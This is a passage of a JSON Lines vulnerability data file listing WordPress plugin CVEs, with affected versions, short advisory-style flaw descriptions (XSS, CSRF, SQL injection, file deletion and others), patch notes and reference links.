replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-gallery\\\/tags\\\/1.3\\\/partials\\\/Shortcode.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-gallery\\\/tags\\\/1.3\\\/partials\\\/Shortcode.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/778f7d9b-6376-4026-a291-1fedeabe8c99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/778f7d9b-6376-4026-a291-1fedeabe8c99?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13437","slug":"book-a-room","versionImpact":"2.9","description":"The Book a Room plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.9. This is due to missing or incorrect nonce validation on the 'bookaroom_Settings' page. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/book-a-room\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/book-a-room\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfef57b6-26b1-433b-9037-46f908422f72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfef57b6-26b1-433b-9037-46f908422f72?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13630","slug":"news-list","versionImpact":"1.0","description":"The NewsTicker WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15eed487-01ac-4c1e-88f8-26cfa036fb54\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15eed487-01ac-4c1e-88f8-26cfa036fb54\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3779","slug":"personizely","versionImpact":"0.10","description":"The Personizely plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018widgetId\u2019 parameter in all versions up to, and including, 0.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/personizely\\\/tags\\\/0.10\\\/class.personizely.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/personizely\\\/tags\\\/0.10\\\/class.personizely.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/personizely\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/personizely\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f07d22ef-5afd-48a4-9e67-31a3ab3efdd6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f07d22ef-5afd-48a4-9e67-31a3ab3efdd6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5923","slug":"game-review-block","versionImpact":"4.8.1","description":"The Game Review Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018className\u2019 parameter in all versions up to, and including, 4.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/mtoensing\\\/game-review-block\\\/commit\\\/135aa118b75db5242df7fd1ef13cc09ec3410f3a\",\"name\":\"https:\\\/\\\/github.com\\\/mtoensing\\\/game-review-block\\\/commit\\\/135aa118b75db5242df7fd1ef13cc09ec3410f3a\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/game-review-block\\\/tags\\\/4.7.0\\\/src\\\/game-table\\\/callback.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/game-review-block\\\/tags\\\/4.7.0\\\/src\\\/game-table\\\/callback.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/game-review-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/game-review-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88520d8e-8e13-4b58-9df3-3b99afd39144?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88520d8e-8e13-4b58-9df3-3b99afd39144?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47615","slug":"learnpress","versionImpact":"4.1.7.3.2","description":"Local File Inclusion vulnerability in LearnPress \u2013 WordPress LMS Plugin <= 4.1.7.3.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"name\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0068","slug":"product-gtin-ean-upc-isbn-for-woocommerce","versionImpact":"1.1.1","description":"The Product GTIN (EAN, UPC, ISBN) for WooCommerce WordPress plugin through 1.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4abd1454-380c-4c23-8474-d7da4b2f3b8e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4abd1454-380c-4c23-8474-d7da4b2f3b8e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5802","slug":"wp-knowledgebase","versionImpact":"1.3.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in Mihai Iova WordPress Knowledge base & Documentation Plugin \u2013 WP Knowledgebase plugin <=\u00a01.3.4 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-knowledgebase\\\/wordpress-wp-knowledgebase-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-knowledgebase\\\/wordpress-wp-knowledgebase-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6501","slug":"splashscreen","versionImpact":"0.20","description":"The Splashscreen WordPress plugin through 0.20 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd19189b-de04-44b6-8ac9-0c32399a8976\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd19189b-de04-44b6-8ac9-0c32399a8976\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6501.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6501.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7073","slug":"auto-post-thumbnail","versionImpact":"4.0.0","description":"The Auto Featured Image (Auto Post Thumbnail) plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.0 via the upload_to_library AJAX action. This makes it possible for authenticated attackers, with author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc024183-0244-4ef9-9171-057ecd1c3e1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc024183-0244-4ef9-9171-057ecd1c3e1d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-post-thumbnail\\\/tags\\\/3.9.18\\\/includes\\\/class-apt.php#L947\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-post-thumbnail\\\/tags\\\/3.9.18\\\/includes\\\/class-apt.php#L947\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6320","slug":"scrollto-top","versionImpact":"1.2.2","description":"The ScrollTo Top plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 1.2.2. This is due to missing nonce validation and missing file type validation in the 'options_page' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e11f1a56-d5a2-47a4-a5cc-34345966495a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e11f1a56-d5a2-47a4-a5cc-34345966495a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scrollto-top\\\/trunk\\\/scrollto-top.php?rev=662578#L238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scrollto-top\\\/trunk\\\/scrollto-top.php?rev=662578#L238\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5809","slug":"wp-ajax-contact-form","versionImpact":"2.2.2","description":"The WP Ajax Contact Form WordPress plugin through 2.2.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against admin users","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0af9fbcf-5f0e-4f7f-ae60-b46e704cf0a5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0af9fbcf-5f0e-4f7f-ae60-b46e704cf0a5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7892","slug":"adstxt","versionImpact":"1.0.0","description":"The adstxt Plugin WordPress plugin through 1.0.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c07a4992-c9a1-46a4-9a52-9e38b6d15440\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c07a4992-c9a1-46a4-9a52-9e38b6d15440\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10726","slug":"friendly-functions-for-welcart","versionImpact":"1.2.4","description":"The Friendly Functions for Welcart plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.4. This is due to missing or incorrect nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/friendly-functions-for-welcart\\\/tags\\\/1.2.4\\\/ffw_function_settings.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/friendly-functions-for-welcart\\\/tags\\\/1.2.4\\\/ffw_function_settings.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friendly-functions-for-welcart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friendly-functions-for-welcart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/305f2f13-178d-4b49-b59b-abb35d111299?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/305f2f13-178d-4b49-b59b-abb35d111299?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11464","slug":"easy-code-snippets","versionImpact":"1.0.2","description":"The Easy Code Snippets plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-code-snippets\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-code-snippets\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f5ddbf-2014-40e7-881d-27148bf133ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f5ddbf-2014-40e7-881d-27148bf133ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13435","slug":"ebook-downloader","versionImpact":"1.0","description":"The Ebook Downloader plugin for WordPress is vulnerable to SQL Injection via the 'download' parameter in all versions up to, and including, 1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-downloader\\\/trunk\\\/ebook_plugin.php#L278\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-downloader\\\/trunk\\\/ebook_plugin.php#L278\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b0c1e5-08f7-44b3-8518-6b0902b84758?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b0c1e5-08f7-44b3-8518-6b0902b84758?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13629","slug":"pushbiz","versionImpact":"1.0","description":"The pushBIZ  WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ffb548c-14f1-499d-8bbf-6ecc632cbb8c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ffb548c-14f1-499d-8bbf-6ecc632cbb8c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2267","slug":"wp01","versionImpact":"2.6.2","description":"The WP01 plugin for WordPress is vulnerable to Arbitrary File Download in all versions up to, and including, 2.6.2 due to a missing capability check and insufficient restrictions on the make_archive() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to download and read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp01\\\/trunk\\\/inc\\\/class-wp01.php#L109\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp01\\\/trunk\\\/inc\\\/class-wp01.php#L109\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp01\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp01\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/900d09e8-ded5-49b9-81bf-ddfc85d3cf2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/900d09e8-ded5-49b9-81bf-ddfc85d3cf2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32257","slug":"1-click-migration","versionImpact":"2.2","description":"Exposure of Sensitive System Information Due to Uncleared Debug Information vulnerability in 1clickmigration 1 Click WordPress Migration allows Retrieve Embedded Sensitive Data. This issue affects 1 Click WordPress Migration: from n\/a through 2.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/1-click-migration\\\/vulnerability\\\/wordpress-1-click-wordpress-migration-plugin-2-1-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/1-click-migration\\\/vulnerability\\\/wordpress-1-click-wordpress-migration-plugin-2-1-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5337","slug":"ml-slider","versionImpact":"3.98.0","description":"The Slider, Gallery, and Carousel by MetaSlider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018aria-label\u2019 parameter in all versions up to, and including, 3.98.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ml-slider\\\/tags\\\/3.98.0\\\/assets\\\/metaslider\\\/script.js#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ml-slider\\\/tags\\\/3.98.0\\\/assets\\\/metaslider\\\/script.js#L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309932\\\/ml-slider\\\/tags\\\/3.99.0\\\/assets\\\/metaslider\\\/script.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309932\\\/ml-slider\\\/tags\\\/3.99.0\\\/assets\\\/metaslider\\\/script.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ml-slider\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ml-slider\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e6492e5-a506-4d77-96d2-08f700b6ee76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e6492e5-a506-4d77-96d2-08f700b6ee76?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7643","slug":"attachment-manager","versionImpact":"2.1.2","description":"The Attachment Manager plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the handle_actions() function in all versions up to, and including, 2.1.2. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attachment-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attachment-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5731b971-4408-4c64-809c-e95fba33009e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5731b971-4408-4c64-809c-e95fba33009e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45820","slug":"learnpress","versionImpact":"4.1.7.3.2","description":"SQL Injection (SQLi) vulnerability in LearnPress \u2013 WordPress LMS Plugin <= 4.1.7.3.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-plugin-4-1-7-3-2-auth-sql-injection-sqli-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-plugin-4-1-7-3-2-auth-sql-injection-sqli-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"name\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0065","slug":"i2-pro-cons","versionImpact":"1.3.1","description":"The i2 Pros & Cons WordPress plugin through 1.3.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42c3ac68-4bbc-4d47-ad53-2c9ed48cd677\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42c3ac68-4bbc-4d47-ad53-2c9ed48cd677\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46074","slug":"freshmail-integration","versionImpact":"2.3.2","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Borbis Media FreshMail For WordPress plugin <=\u00a02.3.2 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/freshmail-integration\\\/wordpress-freshmail-for-wordpress-plugin-2-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/freshmail-integration\\\/wordpress-freshmail-for-wordpress-plugin-2-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4460","slug":"uploading-svgwebp-and-ico-files","versionImpact":"1.2.1","description":"The Uploading SVG, WEBP and ICO files WordPress plugin through 1.2.1 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82f8d425-449a-471f-94df-8439924fd628\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82f8d425-449a-471f-94df-8439924fd628\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6499","slug":"lastunes","versionImpact":"3.6.1","description":"The lasTunes WordPress plugin through 3.6.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69592e52-92db-4e30-92ca-b7b3d5b9185d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/69592e52-92db-4e30-92ca-b7b3d5b9185d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5347","slug":"happy-elementor-addons","versionImpact":"3.10.9","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'arrow' attribute within the plugin's Post Navigation widget in all versions up to, and including, 3.10.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/415a7201-bdff-4342-9e06-ce0e500cdc7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/415a7201-bdff-4342-9e06-ce0e500cdc7c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.9\\\/widgets\\\/post-navigation\\\/widget.php#L588\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.9\\\/widgets\\\/post-navigation\\\/widget.php#L588\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095128\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/post-navigation\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095128\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/post-navigation\\\/widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6317","slug":"generate-pdf-using-contact-form-7","versionImpact":"4.0.6","description":"The Generate PDF using Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 4.0.6. This is due to missing nonce validation and the plugin not properly validating a file or its path prior to deleting it in the 'wp_cf7_pdf_dashboard_html_page' function. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/455b9695-e140-4bdb-b626-5c1695518563?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/455b9695-e140-4bdb-b626-5c1695518563?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generate-pdf-using-contact-form-7\\\/tags\\\/4.0.6\\\/inc\\\/templates\\\/cf7-pdf-generation.admin.html.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generate-pdf-using-contact-form-7\\\/tags\\\/4.0.6\\\/inc\\\/templates\\\/cf7-pdf-generation.admin.html.php#L74\",\"refsource\":\"\",\"tags\":[]}]"}
